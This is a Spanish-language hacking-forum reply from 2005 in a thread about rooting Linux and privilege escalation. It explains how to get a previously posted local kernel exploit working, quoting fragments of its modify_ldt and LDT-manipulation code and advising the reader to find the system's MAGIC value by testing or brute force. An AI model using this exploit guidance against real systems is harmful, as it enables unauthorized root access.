elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
08 Octubre 2008, 02:11  



+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado
| | |-+  Hacking Linux/Unix (Moderador: berz3k)
| | | |-+  enrootar, escalada privilegios, exploits?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] Ir Abajo Imprimir
Autor Tema: enrootar, escalada privilegios, exploits?  (Leído 2398 veces)
Rojodos
"If you wanna be free, you must be different"

Desconectado Desconectado

Mensajes: 3.525



Ver Perfil
Re: enrootar, escalada privilegios, exploits?
« Respuesta #15 en: 09 Febrero 2005, 18:40 »

Bueno, este ultimo exploit que te he puesto, tienes que encontrar el valor de:

Código:
#define MAGIC 0xdeadbabe

En el sistema que quieres explotar. En el codigo, es usado aqui:

Código:
if(r != MAGIC) {
printf("\n[-] FAILED val = 0x%.8x", r); fflush(stdout);
fatal("find LDT", 1);
}

Osea, que MAGIC tiene que ver con la tabla LDT de algun proceso.

Y aqui tambien es usado:

Código:
static struct modify_ldt_ldt_s l;

pnum++;
if(pnum==1) {
pidx = max_page-1;
}
else if(pnum==2) {
memset(&l, 0, sizeof(l));
l.entry_number = LDT_ENTRIES-1;
l.seg_32bit = 1;
l.base_addr = MAGIC >> 16;
l.limit = MAGIC & 0xffff;
l.limit_in_pages = 1;
if( modify_ldt(1, &l, sizeof(l)) != 0 )
fatal("modify_ldt", 1);
pidx = max_page-1;
}

Lo mismo. Tienes que saber el valor "MAGIC" para el sistema que quieres explotar, y para el proceso que tenga que te interesa cargar para saber su LDT. Si no, te fallara el exploit. Lo mas facil que puedes hacer es instalarte ese sistema en tu PC y trastear hasta dar con su valor. O implementar un bruteforce.

Hay mucha info en Inet sobre la tabla LDT en Linux, cuestion de buscar ;)
En línea
Páginas: 1 [2] Ir Arriba Imprimir 
Ir a:  







Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.6 | SMF © 2006-2008, Simple Machines LLC